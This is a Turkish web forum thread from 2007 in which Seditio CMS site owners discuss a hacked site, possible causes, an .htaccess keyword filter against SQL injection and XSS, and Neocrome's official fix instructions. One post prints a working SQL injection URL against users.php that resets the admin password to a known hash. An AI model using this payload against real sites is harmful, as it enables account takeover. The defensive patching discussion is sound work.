Seditio-TR - Forums - Sitem Hacklendi :(( Seditio'da yeni açık galiba..

Etiketler: sitem hacklendi seditioda yeni açık galiba

Author	Message
Hackkobaz Members 52 posts http://www.okyanushack.com Pagerank: 0 Location: Turkey Mekan Occupation: Age: 17	#3753 2007-06-21 19:39 GMT
	arkadashlar Seditio'da Yeni bir açık war galiba DvbiL Sitemi Hacklediler. Açıgı Nasıl kapatabiliriz.. Admin paneline girmiş, Ya benim kullaıcı adım ve şifremle veyada yeni bi admin bilmiorum işte ADmin paneline girip siteyi mahvetmiş. bu ne açıgı olabilir acaba arkadahlar sizlerde onleminizi almanız gerkemekte. : Lütfen yardım edin..
	Hack Etmek Ne Kadar Zor ise, Hacklenmek 'te O Kadar Kolayd?r.
Kaan Moderators 2,082 posts http://www.ntka.org Pagerank: 2 Location: Turkey Occupation: Destek Age: 25	#3758 2007-06-21 21:02 GMT
	Sadece gülmek için mesaj yazıyorum çok gülüncüme gitti
	T?kla An?nda Sende Kazan! Arşiv v2 Lig Tv Plugin
mert Members 34 posts Location: Turkey Occupation: Age: 19	#3760 2007-06-21 21:42 GMT
	Quote Kaan : Sadece gülmek için mesaj yazıyorum çok gülüncüme gitti heha aynen guluyom kardes seditio bi sitesi hacklendimi diye seditio da acikmi var ) ne malum senin siteden herhangi bir eklenti veya bir db lere de hata olusmus siten hacklenmis kardes bole konular acilmasin ozel olarak pm atilsin yonetime ..

Darkcode Members 65 posts http://www.darkcode.us Pagerank: 2 Location: Turkey [192.168.1.1] Occupation: Nuller & Designer & Php Coder Age:	#3763 2007-06-22 12:27 GMT
	Sunucuna girip config dosyasini okuyup mysqle dalmış olabilirler. Veya admin yaptığın birinden şifre almış olabilirler onu hacklemiş olabilirler. Trojan yemiş olabilirsin vs. Yani seditio nun sana yardım etme gibi bir durumu yok. Biraz daha dikkatli olmalısın. Kolay gelsin
	Gitme..
mustanq Members 62 posts http://www.powerfrm.net Pagerank: 1 Location: Turkey Occupation: Age:	#3765 2007-06-22 13:48 GMT
	Bence daha dikkatli ol ve diğer sitelerde kullandıpın şifreden daha farklı olsun harf+rakam+karakterden oluşsun...!!!

MADWOLF Banned 74 posts http://spysecurity.org Pagerank: 0 Location: Turkey izmir Occupation: Amele Age: 21	#3767 2007-06-22 14:45 GMT
	İnsanın sitesinde en büyük açık kendisidir... Cookie'ni çalmış olabilirler , Admin md5'ini kırıp girmiş olabilir Sql'a bağlanıp yeni admin oluşturmuş olabilir Keylogger,Trojan Yemiş olabilirsin Bunların hepsi varsayım Hemen portalda açık var diyemeyiz
	madwolf@w.cn Karanl???n efendisi olaca??ma ayd?nl???n kölesi olurum..
Dvdbil Administrator 2,244 posts http://www.seditio-tr.com Pagerank: 3 Location: Turkey istanbul Occupation: Web Site(ler) İşletmeciliği Age: 28	#3768 2007-06-22 15:01 GMT
	Seditio portalda ciddi bir açık olsa, açığı bulan şahıs küçük sitelerle uğraşmaz.
	Sitelerinize profesyonel anlamda hizmet verilir; - Performans optimizasyonu, - Üst düzey güvenlik yamaları, - İsteğe bağlı eklentiler, - Her çeşit bot (program, video, resim, arsiv, haber), - Profesyonel görsel skin. Tüm tasarım, kodlamalar ve optimizasyon Neocrome referansı ile tarafımca hazırlanmakta. ***********************İSTATİSTİKLER********************* Müşterim olan danışmanlığını yaptığım toplam kişi sayısı: 23 Sadece Eklenti hazırladığım kişi sayısı: 21 Uygulama yaptığım toplam site sayısı: 38 ------------------------------------------------- Müşterinin isteği doğrultusunda hazırladığım; - eklenti sayısı: 44 - skin sayısı: 8 - bot sayısı: 15 - özel güvenlik yamaları: 21 - Sql performans optimizasyonu: 13 (yüksek hitli siteler için) - Portal genel cache ve materyal optimizasyonu: 15 *************************************************************
Darkworm Members 158 posts http://paranoiakind.wordpress.com Pagerank: 0 Location: Turkey Ankara Occupation: Age: 16	#3771 2007-06-22 15:37 GMT
	Cookie çaLmak zor seditioda =] Lamersavar yoksa sql yapmış oLabilirler =] Yada şunuda unutmayalım "Sosyal Mühendislik" bu araların en popüler hack yöntemi =]
	Gökyüzüne değdim gökyüzü limitim T-Networks İnternet ve Bili?im Hizmetleri
Darkcode Members 65 posts http://www.darkcode.us Pagerank: 2 Location: Turkey [192.168.1.1] Occupation: Nuller & Designer & Php Coder Age:	#3773 2007-06-22 15:53 GMT
	40 yılın hostçu kandırma işlemi ne ara "Sosyal mühendislik" oldu yahu.
	Gitme..
Darkworm Members 158 posts http://paranoiakind.wordpress.com Pagerank: 0 Location: Turkey Ankara Occupation: Age: 16	#3774 2007-06-22 16:01 GMT
	Quote Darkcode : 40 yılın hostçu kandırma işlemi ne ara "Sosyal mühendislik" oldu yahu.
	Gökyüzüne değdim gökyüzü limitim T-Networks İnternet ve Bili?im Hizmetleri
Hackkobaz Members 52 posts http://www.okyanushack.com Pagerank: 0 Location: Turkey Mekan Occupation: Age: 17	#3776 2007-06-22 16:23 GMT
	Arkadashlar Trojan Yeme gibi bi durumum yok. Paralı Antivirüs Kullanıyorum, ve PFS, PM gibi Sayfaları Kapattim, Kullanılmıyordu. seditio dizinindeki hiçbiryere Chmod 777 vermedim. SQL 'dan şüpheleniyorum ama seditio'da yeni açık çıktı diye duymuştum o yüzden yeni açık war galiba dedim. Peki bu SQL'dan nasıl kurtulabilirim. Server baya güvenli hatta en güvenli server diyebiliriz. Fakat SQL'dan kurtulmanın başka bi yolu yokmu acaba çünkü ne kdar güvenlik alırsak alalım tüm siteler SQL ile hacklenebilir herhaLde. Server'a girmekte ayrı bi mesele tabi ama yinede server'a girdikten sonra site hacklencek kesin değil mi? peki nasıl güvenlik alabiliri sQL için.
	Hack Etmek Ne Kadar Zor ise, Hacklenmek 'te O Kadar Kolayd?r.
Darkworm Members 158 posts http://paranoiakind.wordpress.com Pagerank: 0 Location: Turkey Ankara Occupation: Age: 16	#3780 2007-06-22 18:29 GMT
	bu işine yarar sanırım =] http://www.seditio-tr.com/43-lamersavar-lite-htaccess-kontrollu.html Ayrıca paralı antivirüs kuLLanmak trojan yemiyceğin anlamına gelmez =] Artık trojancılar durumu aştılar çünkü =] kendi trojanını kodlayıp direk atanLar var..Böle bi durumda ztn antivirüsün trojanı anlaması %5 lik bir ihtimal
	Gökyüzüne değdim gökyüzü limitim T-Networks İnternet ve Bili?im Hizmetleri
Xiao Moderators 868 posts http://www.seditione.com Pagerank: 0 Location: Turkey Trabzon Occupation: Orman Mühendisi Age: 30	#3782 2007-06-22 18:45 GMT
	ben ne dedim.bak hepsi bir bir çıkıyor.birde sözümü dinleseniz tam olacak.inş bir daha hacklenirsiniz.bu yolda gidenlerden hacklenmeyen var mı?çok merak ediyorum Türkiye'nin en büyük siber savunma gücüyüm diyen grup bile basit bir yöntem ile hacklendi.adamların bir kazancı yok ama ne yapsınlar.zevk işte.sizde zevk uğruna içinizi karartıyorsunuz.hadi siz bu yola baş koymuşsunuz.devam edin böyle.bakalım ne zaman kendinize dur diyeceksiniz...
	Haziran 2008 Seditio Site Yar??mas? >> http://www.seditione.com
Hackkobaz Members 52 posts http://www.okyanushack.com Pagerank: 0 Location: Turkey Mekan Occupation: Age: 17	#3806 2007-06-22 21:25 GMT
	SaoL DarkWorm !
	Hack Etmek Ne Kadar Zor ise, Hacklenmek 'te O Kadar Kolayd?r.
emremix Moderators 483 posts Location: Turkey Occupation: emremix Age:	#3831 2007-06-23 21:02 GMT
	arkadaşlar başıma 2 kez geldi seditio da garanti açık var sql injeksiyo İranlı bi hacker tarafından bulumuş.neocrome de var zaten ancak sql injeksiyon yöntemiyle admin şifresi çalınabiliyo bu lamersavar nasıl kurulur bilen var mı ?
	Sudo apt-get Alcohol Forever Ubuntu :)
Darkworm Members 158 posts http://paranoiakind.wordpress.com Pagerank: 0 Location: Turkey Ankara Occupation: Age: 16	#3832 2007-06-23 21:09 GMT
	TopLu siTe hackLenmeLeri oLsa Kasım-2006 daki Gibi Yeni Açık Var Deriz Ama O Kadar TopLu HackLenmeLer Yok =] Ayrıca Bi Açık BuLunsa Ve Kötü NiyetLi Biri oLsa Neocrome , BhsDesign , T3-Design Gibi Hiti oLan SiteLerden BaşLar HackLemeye , Yada İyi NiyetLi Biriyse Çoktan Neocromeye BiLdirmişTi ve Neocrome Bi Yama YayınLamış oLurdu =]
	Gökyüzüne değdim gökyüzü limitim T-Networks İnternet ve Bili?im Hizmetleri
Kaan Moderators 2,082 posts http://www.ntka.org Pagerank: 2 Location: Turkey Occupation: Destek Age: 25	#3834 2007-06-23 21:20 GMT
	Bu tür hack olayları Site Adminlerinin Kendi hatalarından kaynaklanıyor. Portalda yaptıgı değişikler nedeniyle acık cıkıyor yada şifresini kaptırıyor. Eklentilerden Kaynaklanıyor bunun gibi bir sürü ihtimal.
	T?kla An?nda Sende Kazan! Arşiv v2 Lig Tv Plugin
emremix Moderators 483 posts Location: Turkey Occupation: emremix Age:	#3835 2007-06-23 21:35 GMT
	yok aga açık çekirdekde sanırım polls yada profil bölümünden ama başka bi bölümde olabilir yokmu şu lamersavarı kullanmayı öğreticek allah rızası için lütfen
	Sudo apt-get Alcohol Forever Ubuntu :)
sHeeT Members 15 posts Location: Turkey Occupation: Age:	#3836 2007-06-23 21:37 GMT
	Quote root : yok aga açık çekirdekde sanırım polls yada profil bölümünden ama başka bi bölümde olabilir yokmu şu lamersavarı kullanmayı öğreticek allah rızası için lütfen bu kodlar .htacces diye kaydedip ftp'ye at tamam,kendine göre 404.shtml diye dosya oluşturup içine Yasak falan yazabilirsin Code: RewriteEngine on # Rewrite-Code \| by dvdbil www.seditio-tr.com RewriteCond %{QUERY_STRING} (\"\|%22).(\>\|%3E\|<\|%3C). [NC] RewriteRule ^(.)$ 404.shtml [NC] RewriteCond %{QUERY_STRING} (\<\|%3C).script.(\>\|%3E) [NC] RewriteRule ^(.)$ 404.shtml [NC] RewriteCond %{QUERY_STRING} (\;\|\'\|\"\|\%22).(union\|insert\|where\|select\|update\|drop\|md5\|or\|and\|if). [NC] RewriteRule ^(.*)$ 404.shtml [NC] RewriteRule (,\|;\|<\|>\|'\|`) 404.shtml [NC] açık bulan kişi ne yapsın sitenize,açık olsaydı ldu ve seditio destekli siteler ilk önce hacklanırdı veya hack siteleri,sizin siteyi hacklasa ne olcak,

emremix Moderators 483 posts Location: Turkey Occupation: emremix Age:	#3837 2007-06-23 21:48 GMT
	buldum beyler işte o meşhur açık Code: users.php?m=profile&a=avatarselect&x=011A99&id=def ault.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527///where//user_id=1/* bunu sitenin sonuna eklerseniz adminin şifresi 123456 oluyo ama her site yemiyor ancak kendi sitemde çalıştı aşağıya ana siteden yaptığım araştırmayı koyuyorum.tabi 123456 md5 haşına göre deişir Neocrome.net How to fix Seditio (all versions) If you can roll back to a backup : Restore the backup (SQL+files) with your account manager or ask the host's technical support. Download the Seditio package for your version : 110, 102, 101 or 100. Upload the new file /system/core/users/users.profile.inc.php to your webspace, only this one. It's done. If you don't have a backup : You should consider having a host with backups, or making backups yourself. Rename datas/config.php to anything else to be sure your site is really off. Make a SQL backup with phpmyadmin. Download the Seditio package for your version : 110, 102, 101 or 100. Upload the new file /system/core/users/users.profile.inc.php to your webspace, only this one. With phpmyadmin, search function, look for the strings : "hack", "java", "refresh" and "meta" (without the quotes). If you find anything suspicious, manually remove or clean, still with phpmyadmin. Then use this form to MD5 a string and set yourself a new pass, directly in the SQL, table sed_users, column user_password, your account (should be the first). As sample put the string "test" in the top box, press "Calculate hash", and copy/paste the resulting 32 chars string "d8e8fca2..." into the column user_password for your account. Do the same for all your members with administration rights. Still in the table sed_users, delete any recent user where user_maingrp=5 (not your own account of course). Disable Javascript in your browser. Rename datas/config.php back to put the site online. Log-in, disable the user registration from the config panel. In the userlist look at the last members if any managed to join an admin group by using your account. If yes, delete the user. Make another SQL backup with phpmyadmin. Enable the user registration. Notice how it's noticably longer when you don't have backups. It should be done. How to fix Land Down Under (all versions) If you can roll back to a backup : Restore the backup (SQL+files) with your account manager or ask the host's technical support. Open the file /system/core/profile/profile.inc.php, find the string $avatar = $cfg['av_dir'].urldecode($id); and right below, add : $avatar = str_replace("'","",$avatar); $avatar = str_replace(",","",$avatar); $avatar = str_replace(chr(0x00),"",$avatar); Be sure to copy/paste, else it's easy to make typos. Save the file, and upload to your webspace. It's done. If you don't have a backup : You should consider having a host with backups, or making backups yourself. Rename datas/config.php to anything else to be sure your site is really off. Make a SQL backup with phpmyadmin. Open the file /system/core/profile/profile.inc.php, find the string $avatar = $cfg['av_dir'].urldecode($id); and right below, add : $avatar = str_replace("'","",$avatar); $avatar = str_replace(",","",$avatar); $avatar = str_replace(chr(0x00),"",$avatar); Be sure to copy/paste, else it's easy to make typos. Save the file, and upload to your webspace. With phpmyadmin, search function, look for the strings : "hack", "java", "refresh" and "meta" (without the quotes). If you find anything suspicious, manually remove or clean, still with phpmyadmin. Then use this form to MD5 a string and set yourself a new pass, directly in the SQL, table ldu_users, column user_password, your account (should be the first). As sample put the string "test" in the top box, press "Calculate hash", and copy/paste the resulting 32 chars string "d8e8fca2..." into the column user_password for your account. Do the same for all your members with administration rights. Still in the table ldu_users, delete any recent user where user_level is higher than 95 (not your own account of course). Run those queries with phpmyadmin, tab 'SQL' : UPDATE ldu_config SET config_value=0 WHERE config_name='maintenance'; UPDATE ldu_config SET config_value='Upgrading' WHERE config_name='maintenance_reason'; Disable Javascript in your browser. Rename datas/config.php back to put the site online. Log-in, disable the user registration from the config panel. In the userlist look at the last members if any managed to join an admin group by using your account. If yes, delete the user. Make another SQL backup with phpmyadmin. Enable the user registration. Notice how it's noticably longer when you don't have backups. It should be done. bu anasiteden alıntı buda benim yorumum yapmanız gerekenler; profile.inc.php veya users.profile.inc.php dosyalarını açın Code: $avatar = $cfg['av_dir'].urldecode($id); satırını bulun ve bununla değişin Code: $avatar = $cfg['av_dir'].urldecode($id); $avatar = str_replace("'","",$avatar); $avatar = str_replace(",","",$avatar); $avatar = str_replace(chr(0x00),"",$avatar); urldecode() fonksiyonu sonucu oluşan zaafiyeti ortadan kaldırıyor. inşallah doğru aktarabilmişimdir.bu arada teşekürlerinizi eksik etmeyin lütfen
	Sudo apt-get Alcohol Forever Ubuntu :)

Next page > 1 < [2]

Benzer konular (Similar topics) #BETA

Konular	Mesajlar	Son Yazar	Güncelleme
Sitem Hacklendi Sorun Büyük galiba	8	Mahkum	267 Gün
sitem hacklendi	2	phpcoding	422 Gün
Sitem Hacklendi Lütfen Bakın	6	Mahkum	248 Gün
Seditio Da Yeni Açık Önemli	5	Dvdbil	258 Gün
Seditio Sistemim Hacklendi	7	Darkworm	459 Gün

Hackkobaz

Kaan

mert

Darkcode

mustanq

MADWOLF

Dvdbil

Darkworm

Darkcode

Darkworm

Hackkobaz

Darkworm

Xiao

Hackkobaz

emremix

Darkworm

Kaan

emremix

sHeeT

emremix

Benzer konular (Similar topics) #BETA

Keywords (beta):

Forum Arşiv (beta):